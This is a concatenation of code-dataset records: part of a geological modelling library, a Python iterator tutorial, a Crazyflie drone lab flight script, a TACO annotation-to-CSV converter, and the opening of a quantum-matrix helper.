fold_frame.calculate_fold_limb_rotation(\n series_builder)\n fold_limb_rotation = FoldRotationAngle(flr, fld)\n l_wl = kwargs.get(\"limb_wl\", None)\n if 'limb_function' in kwargs:\n # allow for predefined functions to be used\n fold_limb_rotation.set_function(kwargs['limb_function'])\n else:\n fold_limb_rotation.fit_fourier_series(wl=l_wl)\n fold.fold_limb_rotation = fold_limb_rotation\n # fold_limb_fitter = kwargs.get(\"fold_limb_function\",\n # _interpolate_fold_limb_rotation_angle)\n # fold_limb_fitter(series_builder, fold_frame, fold, result, **kwargs)\n kwargs['fold_weights'] = kwargs.get('fold_weights', None)\n\n self._add_faults(series_builder)\n # build feature\n kwargs['cgw'] = 0.\n kwargs['fold'] = fold\n series_feature = series_builder.build(**kwargs)\n series_feature.type = 'series'\n # see if any unconformities are above this feature if so add region\n # self._add_unconformity_above(series_feature)self._add_feature(series_feature)\n # result['support'] = series_feature.get_interpolator().support\n self._add_feature(series_feature)\n return series_feature\n\n def create_and_add_folded_fold_frame(self, fold_frame_data,\n fold_frame=None,\n **kwargs):\n \"\"\"\n\n Parameters\n ----------\n fold_frame_data : string\n\n fold_frame : StructuralFrame\n\n kwargs\n\n Returns\n -------\n fold_frame : FoldFrame\n created fold frame\n \"\"\"\n self.parameters['features'].append(\n {'feature_type': 'folded_fold_frame', 'feature_name': fold_frame_data, 'fold_frame': fold_frame, **kwargs})\n if fold_frame is None:\n logger.info(\"Using last feature as fold frame\")\n fold_frame = self.features[-1]\n assert type(fold_frame) == FoldFrame, \"Please specify a FoldFrame\"\n fold = FoldEvent(fold_frame)\n fold_interpolator = self.get_interpolator(\"DFI\", fold=fold, **kwargs)\n frame_interpolator = self.get_interpolator(**kwargs)\n interpolators = [fold_interpolator, frame_interpolator,\n frame_interpolator.copy()]\n fold_frame_builder = StructuralFrameBuilder(\n interpolators=interpolators, name=fold_frame_data, **kwargs)\n fold_frame_builder.add_data_from_data_frame(\n self.data[self.data['feature_name'] == fold_frame_data])\n\n ## add the data to the interpolator for the main foliation\n fold_frame_builder[0].add_data_to_interpolator(True)\n if \"fold_axis\" in kwargs:\n fold.fold_axis = kwargs['fold_axis']\n if \"av_fold_axis\" in kwargs:\n _calculate_average_intersection(fold_frame_builder[0], fold_frame,\n fold)\n\n if fold.fold_axis is None:\n far, fad = fold_frame.calculate_fold_axis_rotation(\n fold_frame_builder[0])\n fold_axis_rotation = FoldRotationAngle(far, fad)\n a_wl = kwargs.get(\"axis_wl\", None)\n if 'axis_function' in kwargs:\n # allow predefined function to be used\n fold_axis_rotation.set_function(kwargs['axis_function'])\n else:\n fold_axis_rotation.fit_fourier_series(wl=a_wl)\n fold.fold_axis_rotation = fold_axis_rotation\n # give option of passing own fold limb rotation function\n flr, fld = fold_frame.calculate_fold_limb_rotation(\n fold_frame_builder[0])\n fold_limb_rotation = FoldRotationAngle(flr, fld)\n l_wl = kwargs.get(\"limb_wl\", None)\n if 'limb_function' in kwargs:\n # allow for predefined functions to be used\n fold_limb_rotation.set_function(kwargs['limb_function'])\n else:\n fold_limb_rotation.fit_fourier_series(wl=l_wl)\n fold.fold_limb_rotation = fold_limb_rotation\n # fold_limb_fitter = kwargs.get(\"fold_limb_function\",\n # _interpolate_fold_limb_rotation_angle)\n # fold_limb_fitter(series_builder, fold_frame, fold, result, **kwargs)\n kwargs['fold_weights'] = kwargs.get('fold_weights', None)\n\n for i in range(3):\n self._add_faults(fold_frame_builder[i])\n # build feature\n kwargs['cgw'] = 0.\n kwargs['fold'] = fold\n self._add_faults(fold_frame_builder[0])\n self._add_faults(fold_frame_builder[1])\n self._add_faults(fold_frame_builder[2])\n fold_frame = fold_frame_builder.build(**kwargs, frame=FoldFrame)\n fold_frame.type = 'structuralframe'\n # see if any unconformities are above this feature if so add region\n # for i in range(3):\n # self._add_unconformity_above(fold_frame[i])\n\n self._add_feature(fold_frame)\n \n\n return fold_frame\n\n def _add_faults(self, feature_builder, features=None):\n \"\"\"\n\n Parameters\n ----------\n feature_builder\n\n Returns\n -------\n\n \"\"\"\n if features is None:\n features = self.features\n for f in reversed(features):\n if f.type == 'fault':\n feature_builder.add_fault(f)\n # if f.type == 'unconformity':\n # break\n def _add_domain_fault_above(self, feature):\n \"\"\"\n Looks through the feature list and adds any domain faults to the feature. The domain fault masks everything\n where the fault scalar field is < 0 as being active when added to feature.\n\n Parameters\n ----------\n feature : GeologicalFeatureInterpolator\n the feature being added to the model where domain faults should be added\n\n Returns\n -------\n\n \"\"\"\n for f in reversed(self.features):\n if f.type == 'domain_fault':\n feature.add_region(lambda pos: f.evaluate_value(pos) < 0)\n break\n\n def _add_domain_fault_below(self, domain_fault):\n \"\"\"\n Looks through the feature list and adds any the domain_fault to the features that already exist in the stack\n until an unconformity is reached. domain faults to the feature. The domain fault masks everything\n where the fault scalar field is < 0 as being active when added to feature.\n\n Parameters\n ----------\n feature : GeologicalFeatureInterpolator\n the feature being added to the model where domain faults should be added\n\n Returns\n -------\n\n \"\"\"\n for f in reversed(self.features):\n f.add_region(lambda pos: domain_fault.evaluate_value(pos) > 0)\n if f.type == 'unconformity':\n break\n\n def _add_unconformity_above(self, feature):\n \"\"\"\n\n Adds a region to the feature to prevent the value from being\n interpolated where the unconformities exists above e.g.\n if there is another feature above and the unconformity is at 0\n then the features added below (after) will only be visible where the\n uncomformity is <0\n\n Parameters\n ----------\n feature - GeologicalFeature\n\n Returns\n -------\n\n \"\"\"\n for f in reversed(self.features):\n if f.type == 'unconformity':\n feature.add_region(lambda pos: f.evaluate(pos))\n break\n\n def _add_unconformity_below(self, feature):\n \"\"\"\n Adds a region to the features that represents the\n unconformity so it is not evaluated below the unconformity\n\n Parameters\n ----------\n feature\n\n Returns\n -------\n\n \"\"\"\n for f in self.features:\n if f.type == 'series' and feature.feature.name != f.name:\n f.add_region(lambda pos: ~feature.evaluate(pos))\n # for f in reversed(self.features):\n # if f.type == 'unconformity':\n # feature.add_region(lambda pos: f.evaluate(pos))\n # break\n # feature.add_region(lambda pos: ~uc.evaluate(pos))\n\n def create_and_add_unconformity(self, unconformity_surface_data, **kwargs):\n \"\"\"\n Parameters\n ----------\n unconformity_surface_data : string\n name of the unconformity data in the data frame\n\n Returns\n -------\n \"\"\"\n # self.parameters['features'].append({'feature_type':'unconformity','feature_name':unconformity_surface_data,**kwargs})\n interpolator = self.get_interpolator(**kwargs)\n unconformity_feature_builder = GeologicalFeatureInterpolator(\n interpolator, name=unconformity_surface_data)\n # add data\n unconformity_data = self.data[\n self.data['feature_name'] == unconformity_surface_data]\n\n unconformity_feature_builder.add_data_from_data_frame(\n unconformity_data)\n # look through existing features if there is a fault before an\n # unconformity\n # then add to the feature, once we get to an unconformity stop\n self._add_faults(unconformity_feature_builder)\n\n # build feature\n uc_feature_base = unconformity_feature_builder.build(**kwargs)\n uc_feature_base.type = 'unconformity_base'\n # uc_feature = UnconformityFeature(uc_feature_base,0)\n # iterate over existing features and add the unconformity as a\n # region so the feature is only\n # evaluated where the unconformity is positive\n return self.add_unconformity(uc_feature_base, 0)\n\n def add_unconformity(self, feature, value):\n \"\"\"\n Use an existing feature to add an unconformity to the model.\n\n Parameters\n ----------\n feature : GeologicalFeature\n existing geological feature\n value : float\n scalar value of isosurface that represents\n\n Returns\n -------\n unconformity : GeologicalFeature\n unconformity feature \n\n \"\"\"\n self.parameters['features'].append({'feature_type': 'unconformity', 'feature': feature, 'value': value})\n uc_feature = UnconformityFeature(feature, value)\n\n # for f in self.features:\n # f.add_region(lambda pos: uc_feature.evaluate(pos))\n\n # see if any unconformities are above this feature if so add region\n # self._add_unconformity_above(uc_feature)\n # self._add_unconformity_below(feature)#, uc_feature)\n self._add_feature(uc_feature)\n\n \n return uc_feature\n\n def add_onlap_unconformity(self, feature, value):\n \"\"\"\n Use an existing feature to add an unconformity to the model.\n\n Parameters\n ----------\n feature : GeologicalFeature\n existing geological feature\n value : float\n scalar value of isosurface that represents\n\n Returns\n -------\n unconformity_feature : GeologicalFeature\n the created unconformity\n\n \"\"\"\n self.parameters['features'].append({'feature_type': 'onlap', 'feature': feature, 'value': value})\n\n uc_feature = UnconformityFeature(feature, value)\n\n # for f in self.features:\n # f.add_region(lambda pos: uc_feature.evaluate(pos))\n\n # see if any unconformities are above this feature if so add region\n # self._add_unconformity_above(uc_feature)\n self._add_unconformity_below(uc_feature) # , uc_feature)\n self._add_feature(uc_feature)\n\n\n return uc_feature\n\n def create_and_add_domain_fault(self, fault_surface_data, **kwargs):\n \"\"\"\n Parameters\n ----------\n fault_surface_data : string\n name of the domain fault data in the data frame\n\n Returns\n -------\n domain_Fault : GeologicalFeature\n the created domain fault\n\n \"\"\"\n # self.parameters['features'].append({'feature_type':'unconformity','feature_name':unconformity_surface_data,**kwargs})\n interpolator = self.get_interpolator(**kwargs)\n domain_fault_feature_builder = GeologicalFeatureInterpolator(\n interpolator, name=fault_surface_data)\n # add data\n unconformity_data = self.data[\n self.data['feature_name'] == fault_surface_data]\n\n domain_fault_feature_builder.add_data_from_data_frame(\n unconformity_data)\n # look through existing features if there is a fault before an\n # unconformity\n # then add to the feature, once we get to an unconformity stop\n self._add_faults(domain_fault_feature_builder)\n\n # build feature\n domain_fault = domain_fault_feature_builder.build(**kwargs)\n domain_fault.type = 'domain_fault'\n # uc_feature = UnconformityFeature(uc_feature_base,0)\n # iterate over existing features and add the unconformity as a\n # region so the feature is only\n # evaluated where the unconformity is positive\n return self.add_unconformity(domain_fault, 0)\n\n def create_and_add_fault(self, fault_surface_data, displacement, **kwargs):\n \"\"\"\n Parameters\n ----------\n fault_surface_data : string\n name of the fault surface data in the dataframe\n displacement : displacement magnitude\n kwargs : additional kwargs for Fault and interpolators\n\n Returns\n -------\n fault : FaultSegment\n created fault\n \"\"\"\n self.parameters['features'].append(\n {'feature_type': 'fault', 'feature_name': fault_surface_data, 'displacement': displacement, **kwargs})\n\n displacement_scaled = displacement / self.scale_factor\n # create fault frame\n interpolator = self.get_interpolator(**kwargs)\n fault_frame_builder = StructuralFrameBuilder(interpolator,\n name=fault_surface_data,\n **kwargs)\n # add data\n fault_frame_data = self.data[\n self.data['feature_name'] == fault_surface_data].copy()\n if 'coord' not in fault_frame_data:\n fault_frame_data['coord'] = 0\n vals = fault_frame_data['val']\n if len(np.unique(vals[~np.isnan(vals)])) == 1:\n xyz = fault_frame_data[['X', 'Y', 'Z']].to_numpy()\n p1 = xyz[0, :] # fault_frame_data.loc[0 ,['X','Y']]\n p2 = xyz[-1, :] # fault_frame_data.loc[-1 ,['X','Y']]\n # get a vector that goes from p1-p2 and normalise\n vector = p1 - p2\n length = np.linalg.norm(vector)\n vector /= length\n # now create the orthogonal vector\n # newvector = np.zeros(3)\n length /= 3\n # length/=2\n # print(fault_frame_data)\n mask = ~np.isnan(fault_frame_data['nx'])\n vectors = fault_frame_data[mask][['nx', 'ny', 'nz']].to_numpy()\n lengths = np.linalg.norm(vectors, axis=1)\n vectors /= lengths[:, None]\n fault_frame_data.loc[mask, ['nx', 'ny', 'nz']] = vectors\n if 'strike' in fault_frame_data.columns and 'dip' in \\\n fault_frame_data.columns:\n fault_frame_data = fault_frame_data.drop(['dip', 'strike'],\n axis=1)\n # print(fault_frame_data)\n # if there is no slip direction data assume vertical\n if fault_frame_data[fault_frame_data['coord'] == 1].shape[0] == 0:\n logger.info(\"Adding fault frame slip\")\n loc = np.mean(fault_frame_data[['X', 'Y', 'Z']], axis=0)\n coord1 = pd.DataFrame([[loc[0], loc[1], loc[2], 0, 0, -1]],\n columns=normal_vector_headers())\n coord1['coord'] = 1\n fault_frame_data = pd.concat([fault_frame_data, coord1],\n sort=False)\n \n if fault_frame_data[fault_frame_data['coord'] == 2].shape[0] == 0:\n logger.info(\"Adding fault extent data as first and last point\")\n ## first and last point of the line\n value_data = fault_frame_data[fault_frame_data['val'] == 0]\n coord2 = value_data.iloc[[0, len(value_data) - 1]]\n coord2 = coord2.reset_index(drop=True)\n c2_scale = kwargs.get('length_scale',1.)\n coord2.loc[0, 'val'] = -1/c2_scale\n coord2.loc[1, 'val'] = 1/c2_scale\n coord2['coord'] = 2\n fault_frame_data = pd.concat([fault_frame_data, coord2],\n sort=False)\n fault_frame_builder.add_data_from_data_frame(fault_frame_data)\n # if there is no fault slip data then we could find the strike of\n # the fault and build\n # the second coordinate\n # if we add a region to the fault then the fault operator doesn't\n # work but for visualisation\n # we want to add a region!\n\n if 'splayregion' in kwargs and 'splay' in kwargs:\n # result['splayregionfeature'] = RegionFeature(kwargs['splayregion'])\n # apply splay to all parts of fault frame\n for i in range(3):\n # work out the values of the nodes where we want hard\n # constraints\n idc = np.arange(0, interpolator.support.n_nodes)[\n kwargs['splayregion'](interpolator.support.nodes)]\n val = kwargs['splay'][i].evaluate_value(\n interpolator.support.nodes[\n kwargs['splayregion'](interpolator.support.nodes), :])\n mask = ~np.isnan(val)\n fault_frame_builder[i].interpolator.add_equality_constraints(\n idc[mask], val[mask])\n # check if this fault overprint any existing faults exist in the stack\n overprinted = kwargs.get('overprinted', [])\n self._add_faults(fault_frame_builder[0],overprinted)\n self._add_faults(fault_frame_builder[1],overprinted)\n self._add_faults(fault_frame_builder[2],overprinted)\n\n fault_frame = fault_frame_builder.build(**kwargs)\n if 'abut' in kwargs:\n fault_frame[0].add_region(lambda pos: kwargs['abut'].evaluate(pos))\n\n fault = FaultSegment(fault_frame, displacement=displacement_scaled,\n **kwargs)\n for f in reversed(self.features):\n if f.type == 'unconformity':\n fault.add_region(lambda pos: f.evaluate_value(pos) <= 0)\n break\n if displacement == 0:\n fault.type = 'fault_inactive'\n self._add_feature(fault)\n \n\n return fault\n\n def rescale(self, points):\n \"\"\"\n Convert from model scale to real world scale - in the future this\n should also do transformations?\n\n Parameters\n ----------\n points\n\n Returns\n -------\n \"\"\"\n points *= self.scale_factor\n points += self.origin\n return points\n\n def scale(self, points):\n \"\"\"\n Parameters\n ----------\n points : np.array((N,3),dtype=float)\n points to \n\n Returns\n -------\n \"\"\"\n points = points.copy()\n points[:, :] -= self.origin\n points /= self.scale_factor\n return points\n\n def voxet(self, nsteps=(50, 50, 25)):\n \"\"\"\n Returns a voxet dict with the nsteps specified\n\n Parameters\n ----------\n nsteps : tuple\n number of cells in\n\n Returns\n -------\n \"\"\"\n return {'bounding_box': self.bounding_box, 'nsteps': nsteps}\n\n def regular_grid(self, nsteps=(50, 50, 25), shuffle = True):\n \"\"\"\n Return a regular grid within the model bounding box\n\n Parameters\n ----------\n nsteps : tuple\n number of cells in x,y,z\n\n Returns\n -------\n xyz : np.array((N,3),dtype=float)\n locations of points in regular grid\n \"\"\"\n x = np.linspace(self.bounding_box[0, 0], self.bounding_box[1, 0],\n nsteps[0])\n y = np.linspace(self.bounding_box[0, 1], self.bounding_box[1, 1],\n nsteps[1])\n z = np.linspace(self.bounding_box[1, 2], self.bounding_box[0, 2],\n nsteps[2])\n xx, yy, zz = np.meshgrid(x, y, z, indexing='ij')\n locs = np.array([xx.flatten(), yy.flatten(), zz.flatten()]).T\n if shuffle:\n np.random.shuffle(locs)\n return locs\n\n def evaluate_model(self, xyz, rescale=True):\n \"\"\"Evaluate the stratigraphic id at each location\n \n\n Parameters\n ----------\n xyz : np.array((N,3),dtype=float)\n locations\n rescale : bool\n whether to rescale the model\n\n Returns\n -------\n stratigraphic_id : np.array(N,dtype=int)\n the stratigraphic index for locations\n \n Examples\n --------\n Evaluate on a voxet\n\n >>> x = np.linspace(self.bounding_box[0, 0], self.bounding_box[1, 0],\n nsteps[0])\n >>> y = np.linspace(self.bounding_box[0, 1], self.bounding_box[1, 1],\n nsteps[1])\n >>> z = np.linspace(self.bounding_box[1, 2], self.bounding_box[0, 2],\n nsteps[2])\n >>> xx, yy, zz = np.meshgrid(x, y, z, indexing='ij')\n >>> xyz = np.array([xx.flatten(), yy.flatten(), zz.flatten()]).T\n >>> model.evaluate_model(xyz)\n\n Evaluate on points defined by regular grid function\n \n >>> model.evaluate_model(model.regular_grid())\n\n\n Evaluate on a map\n \n >>> x = np.linspace(self.bounding_box[0, 0], self.bounding_box[1, 0],\n nsteps[0])\n >>> y = np.linspace(self.bounding_box[0, 1], self.bounding_box[1, 1],\n nsteps[1])\n >>> xx, yy = np.meshgrid(x, y, indexing='ij')\n >>> zz = np.zeros_like(yy)\n >>> xyz = np.array([xx.flatten(), yy.flatten(), zz.flatten()]).T\n >>> model.evaluate_model(xyz)\n \n \"\"\"\n strat_id = np.zeros(xyz.shape[0],dtype=int)\n for group in self.stratigraphic_column.keys():\n feature_id = self.feature_name_index.get(group, -1)\n if feature_id >= 0:\n feature = self.features[feature_id]\n vals = feature.evaluate_value(xyz)\n for series in self.stratigraphic_column[group].values():\n strat_id[np.logical_and(vals < series.get('max',feature.max()), vals > series.get('min',feature.min()))] = series['id']\n if feature_id == -1:\n logger.error('Model does not contain {}'.format(group))\n return strat_id\n\n def get_feature_by_name(self, feature_name):\n \"\"\"Returns a feature from the mode given a name\n\n\n Parameters\n ----------\n feature_name : string\n the name of the feature\n\n Returns\n -------\n feature : GeologicalFeature\n the geological feature with the specified name, or none if no feature\n \"\"\"\n feature_index = self.feature_name_index.get(feature_name,-1)\n if feature_index >0:\n return self.features[feature_index]\n else:\n return None\n\n def evaluate_feature_value(self, feature_name, xyz, scale=True):\n \"\"\"Evaluate the scalar value of the geological feature given the name at locations\n xyz\n\n Parameters\n ----------\n feature_name : string\n name of the feature\n xyz : np.array((N,3))\n locations to evaluate\n scale : bool, optional\n whether to scale real world points into model scale, by default True\n\n Returns\n -------\n np.array((N))\n vector of scalar values\n \"\"\"\n feature = self.get_feature_by_name(feature_name)\n if feature:\n if scale:\n scaled_xyz = self.scale(xyz)\n return feature.evaluate_value(scaled_xyz)\n else:\n return np.zeros(xyz.shape[0])\n\n def evaluate_feature_gradient(self, feature_name, xyz, scale=True):\n \"\"\"Evaluate the gradient of the geological feature at a location\n\n Parameters\n ----------\n feature_name : string\n name of the geological feature \n xyz : np.array((N,3))\n locations to evaluate\n scale : bool, optional\n whether to scale real world points into model scale, by default True\n\n Returns\n -------\n results : np.array((N,3))\n gradient of the scalar field at the locations specified\n \"\"\"\n feature = self.get_feature_by_name(feature_name)\n if feature:\n if scale:\n scaled_xyz = self.scale(xyz)\n return feature.evaluate_gradient(scaled_xyz)\n else:\n return np.zeros(xyz.shape[0]) ","sub_path":"LoopStructural/modelling/core/geological_model.py","file_name":"geological_model.py","file_ext":"py","file_size_in_byte":43573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"497887622","text":"# __author__: Stanley\n# date: 2018/3/28\n\n# 生成器都是迭代器,迭代器不一定是生成器。\n\nl = [1,2,3,5]\nd = iter(l)\nprint(d) # \n\n# 迭代器(两个条件)\n# 1.有inter方法。\n# 2.有next方法。\n\n\n# for 循环内部三件事:\n# 1.调用可以迭代对象的iter方法,返回一个迭代器对象\n# 2.不断调用迭代器对象的next方法。\n# 3.捕获迭代器异常,进行处理stopiteration。\nfor i in d:\n print(i)\n\n","sub_path":"day17/迭代器.py","file_name":"迭代器.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"421121812","text":"import logging\nimport time\nimport json\nimport numpy as np\nimport cflib.crtp\nfrom cflib.crazyflie import Crazyflie\nfrom cflib.crazyflie.log import LogConfig\n\n# Specify the uri of the drone to which we want to connect (if your radio\n# channel is X, the uri should be 'radio://0/X/2M/E7E7E7E7E7')\nuri = 'radio://0/0/2M/E7E7E7E7E7'\n\n# Specify the variables we want to log (all at 100 Hz)\nvariables = [\n # State estimates (stock code)\n 'ae483log.o_x',\n 'ae483log.o_y',\n 'ae483log.o_z',\n 'ae483log.psi',\n 'ae483log.theta',\n 'ae483log.phi',\n 'ae483log.v_x',\n 'ae483log.v_y',\n 'ae483log.v_z',\n # Measurements\n 'ae483log.w_x',\n 'ae483log.w_y',\n 'ae483log.w_z',\n 'ae483log.n_x',\n 'ae483log.n_y',\n 'ae483log.r',\n 'ae483log.a_z',\n # Setpoint\n 'ae483log.o_x_des',\n 'ae483log.o_y_des',\n 'ae483log.o_z_des',\n # Motor power commands\n 'ae483log.m_1',\n 'ae483log.m_2',\n 'ae483log.m_3',\n 'ae483log.m_4',\n]\n\n\nclass SimpleClient:\n def __init__(self, uri, use_controller=False, use_observer=False):\n self.init_time = time.time()\n self.use_controller = use_controller\n self.use_observer = use_observer\n self.cf = Crazyflie(rw_cache='./cache')\n self.cf.connected.add_callback(self.connected)\n self.cf.connection_failed.add_callback(self.connection_failed)\n self.cf.connection_lost.add_callback(self.connection_lost)\n self.cf.disconnected.add_callback(self.disconnected)\n print(f'Connecting to {uri}')\n self.cf.open_link(uri)\n self.is_connected = False\n self.data = {}\n\n def connected(self, uri):\n print(f'Connected to {uri}')\n self.is_connected = True\n\n # Start logging\n self.logconfs = []\n self.logconfs.append(LogConfig(name=f'LogConf0', period_in_ms=10))\n num_variables = 0\n for v in variables:\n num_variables += 1\n if num_variables > 5: # <-- could increase if you paid attention to types / sizes (max 30 bytes per packet)\n num_variables = 0\n self.logconfs.append(LogConfig(name=f'LogConf{len(self.logconfs)}', period_in_ms=10))\n self.data[v] = {'time': [], 'data': []}\n self.logconfs[-1].add_variable(v)\n for logconf in self.logconfs:\n try:\n self.cf.log.add_config(logconf)\n logconf.data_received_cb.add_callback(self.log_data)\n logconf.error_cb.add_callback(self.log_error)\n logconf.start()\n except KeyError as e:\n print(f'Could not start {logconf.name} because {e}')\n for v in logconf.variables:\n print(f' - {v.name}')\n except AttributeError:\n print(f'Could not start {logconf.name} because of bad configuration')\n for v in logconf.variables:\n print(f' - {v.name}')\n\n # Reset the stock EKF\n self.cf.param.set_value('kalman.resetEstimation', 1)\n\n # Enable the controller (1 for stock controller, 4 for ae483 controller)\n if self.use_controller:\n self.cf.param.set_value('stabilizer.controller', 4)\n else:\n self.cf.param.set_value('stabilizer.controller', 1)\n\n # Enable the observer (0 for disable, 1 for enable)\n if self.use_observer:\n self.cf.param.set_value('ae483par.use_observer', 1)\n else:\n self.cf.param.set_value('ae483par.use_observer', 0)\n\n def connection_failed(self, uri, msg):\n print(f'Connection to {uri} failed: {msg}')\n\n def connection_lost(self, uri, msg):\n print(f'Connection to {uri} lost: {msg}')\n\n def disconnected(self, uri):\n print(f'Disconnected from {uri}')\n self.is_connected = False\n\n def log_data(self, timestamp, data, logconf):\n for v in logconf.variables:\n self.data[v.name]['time'].append(timestamp)\n self.data[v.name]['data'].append(data[v.name])\n\n def log_error(self, logconf, msg):\n print(f'Error when logging {logconf}: {msg}')\n\n def move(self, x, y, z, yaw, dt):\n print(f'Move to {x}, {y}, {z} with yaw {yaw} degrees for {dt} seconds')\n start_time = time.time()\n while time.time() - start_time < dt:\n self.cf.commander.send_position_setpoint(x, y, z, yaw)\n time.sleep(0.1)\n\n def move_smooth(self, p1, p2, yaw, dt):\n print(f'Move smoothly from {p1} to {p2} with yaw {yaw} degrees in {dt} seconds')\n p1 = np.array(p1)\n p2 = np.array(p2)\n start_time = time.time()\n while True:\n current_time = time.time()\n s = (current_time - start_time) / dt\n p = (1 - s) * p1 + (s * p2)\n self.cf.commander.send_position_setpoint(p[0], p[1], p[2], yaw)\n if s >= 1:\n return\n else:\n time.sleep(0.1)\n\n def stop(self, dt):\n print(f'Stop for {dt} seconds')\n self.cf.commander.send_stop_setpoint()\n start_time = time.time()\n while time.time() - start_time < dt:\n time.sleep(0.1)\n\n def disconnect(self):\n self.cf.close_link()\n\n def write_data(self, filename='logged_data.json'):\n with open(filename, 'w') as outfile:\n json.dump(self.data, outfile, indent=4, sort_keys=False)\n\nif __name__ == '__main__':\n # Initialize everything\n logging.basicConfig(level=logging.ERROR)\n cflib.crtp.init_drivers()\n\n # Create and start the client that will connect to the drone\n client = SimpleClient(uri, use_controller=True, use_observer=False)\n while not client.is_connected:\n print(f' ... connecting ...')\n time.sleep(1.0)\n\n # Leave time at the start to initialize\n client.stop(1.0)\n\n # Take off and hover (with zero yaw)\n client.move(0.0, 0.0, 0.15, 0.0, 1.0)\n client.move(0.0, 0.0, 0.50, 0.0, 1.0)\n\n # Fly in a square five times (with a pause at each corner)\n num_squares = 5\n for i in range(num_squares):\n client.move_smooth([0.0, 0.0, 0.5], [0.5, 0.0, 0.5], 0.0, 2.0)\n client.move(0.5, 0.0, 0.5, 0.0, 1.0)\n client.move_smooth([0.5, 0.0, 0.5], [0.5, 0.5, 0.5], 0.0, 2.0)\n client.move(0.5, 0.5, 0.5, 0.0, 1.0)\n client.move_smooth([0.5, 0.5, 0.5], [0.0, 0.5, 0.5], 0.0, 2.0)\n client.move(0.0, 0.5, 0.5, 0.0, 1.0)\n client.move_smooth([0.0, 0.5, 0.5], [0.0, 0.0, 0.5], 0.0, 2.0)\n client.move(0.0, 0.0, 0.5, 0.0, 1.0)\n\n # Go back to hover (with zero yaw) and prepare to land\n client.move(0.0, 0.0, 0.50, 0.0, 1.0)\n client.move(0.0, 0.0, 0.15, 0.0, 1.0)\n\n # Land\n client.stop(1.0)\n\n # Disconnect from drone\n client.disconnect()\n\n # Write data from flight\n client.write_data('hardware_data.json')\n","sub_path":"lab08/flight.py","file_name":"flight.py","file_ext":"py","file_size_in_byte":6834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"337393891","text":"import json\nimport csv\nfrom os import listdir\nfrom os.path import isfile, join\n\nimagesPath = \"../../public/assets/images/\"\nCSVFileName = \"GroundTruth_TrueFalseByClass.csv\" #output name\n\n#Classes\nUnbrokenGlass = [6, 23, 26]\nBrokenGlass = [9]\nPlasticBagWrapper = [36, 37, 38, 39, 40, 41, 42]\nPlasticBottle = [4, 5]\n#PlasticContainer = [43, 44, 45, 46, 47]\nOtherPlastic = [7, 21, 24, 27, 29, 48, 49, 55, 43, 44, 45, 46, 47]\nAluminumCan = [10, 11, 12]\nOtherAluminum = [0, 2, 50]\nPaperBag = [34, 35]\nOtherPaper = [20, 30, 31, 32, 33, 56]\nFoodWaste = [25]\nOther = [1, 3, 8, 13, 14, 15, 16, 17, 18, 19, 22, 28, 51, 52, 53, 54, 57, 58, 59]\n #[UnbrokenGlass, BrokenGlass, PlasticBagWrapper, PlasticContainer, OtherPlastic, \\\nClassList = [UnbrokenGlass, BrokenGlass, PlasticBagWrapper, PlasticBottle, OtherPlastic, \\\n AluminumCan, OtherAluminum, PaperBag, OtherPaper, FoodWaste, Other]\nNumClasses = len(ClassList)\nheaders = [\"id_TACO\", \"file_name\", \"UnbrokenGlass\", \"BrokenGlass\", \"PlasticBagWrapper\", \\\n \"PlasticBottle\", \"OtherPlastic\", \"AluminumCan\", \"OtherAluminum\", \"PaperBag\", \"OtherPaper\", \\\n \"FoodWaste\", \"Other\"]\n\ndef ConvertJSONCategoriesToCSVCategories(categoryList):\n #categoryList is the categories for an image (e.g. say img45 categories are [6, 6, 3, 25])\n CatToCSV = [0]*NumClasses #Empty list\n for i in range(NumClasses): #Loop the classes (e.g. UnbrokenGlass)\n CurrentClassList = ClassList[i]\n CurrentClassCount = 0\n for c in range(len(CurrentClassList)): #Loop the categories from json\n CurrentSubClassID = CurrentClassList[c]\n #Add the amount of times this class appears in the image\n CurrentClassCount = CurrentClassCount + categoryList.count(CurrentSubClassID)\n if CurrentClassCount > 0:\n CurrentClassCount = 1\n CatToCSV[i] = CurrentClassCount\n return CatToCSV\n\n#Read json file\nwith open(\"images.json\") as file:\n data = json.load(file)\n\n#Get all pilot file names for cross-referencing the images.json file to find count per class (per image)\n# batches = []\n# batchNums = [1,2,3,4,5,6,7,8,9,14,15] #Batches numbers in Pilot folder\n# numBatches = len(batchNums)\n# batchPath = '../images/batch_'\n# for i in range(numBatches):\n# batchNum = str(batchNums[i])\n# currentBatchPath = batchPath + batchNum\n# #get list of all files in batch i\n# imageNames = [f for f in listdir(currentBatchPath) if isfile(join(currentBatchPath, f))]\n# for n in range(len(imageNames)): #concat 'batch_i/' to file names\n# imageNames[n] = 'batch_' + batchNum + '/' + imageNames[n]\n# batches = batches + imageNames #concat filenames to prev batch\n\n#get list of all files\nimageNames = [f.replace(\"-\",\"/\") for f in listdir(imagesPath) if isfile(join(imagesPath, f))]\n\n#Write data to .csv\nwith open(CSVFileName, \"w\") as file:\n csv_file = csv.writer(file)\n\n #Write column headers\n csv_file.writerow(headers)\n\n #Loop through each image, save out class count to csv\n for item in data[\"images\"]:\n CatCSV = ConvertJSONCategoriesToCSVCategories(item['categories'])\n if any(item['file_name'] in s for s in imageNames): #only save out class count if it's in pilot\n csv_file.writerow([item['id'], item['file_name'], CatCSV[0], CatCSV[1], CatCSV[2], CatCSV[3], \\\n CatCSV[4], CatCSV[5], CatCSV[6], CatCSV[7], CatCSV[8], CatCSV[9], CatCSV[10] ])\n","sub_path":"src/SimulateClassifier/jsonToCsv.py","file_name":"jsonToCsv.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"309665650","text":"import numpy\nimport misc\n\n# def lattice_momentum_unit(spatial_extent,boundary_conditions='anti-periodic'):\n# return (2*numpy.pi/spatial_extent)\n\n# def brick_wall_deviation_factor(p2,q2,m,spatial_extent):\n# lm = quantum.lattice_momentum(spatial_extent)\n# p2_actual = p2*(lm**2)\n# q2_actual = q2*(lm**2)\n# E = numpy.sqrt(p2_actual + m**2)\n# return (4*p2_actual - q2_actual)/(4*m*(E+m))\n\n\ndef commutator(x, y):\n return x*y - y*x\n\n\ndef anticommutator(x, y):\n return x*y + y*x\n\nI = numpy.mat(numpy.identity(4))\n\n# Pauli matrices\npauli = 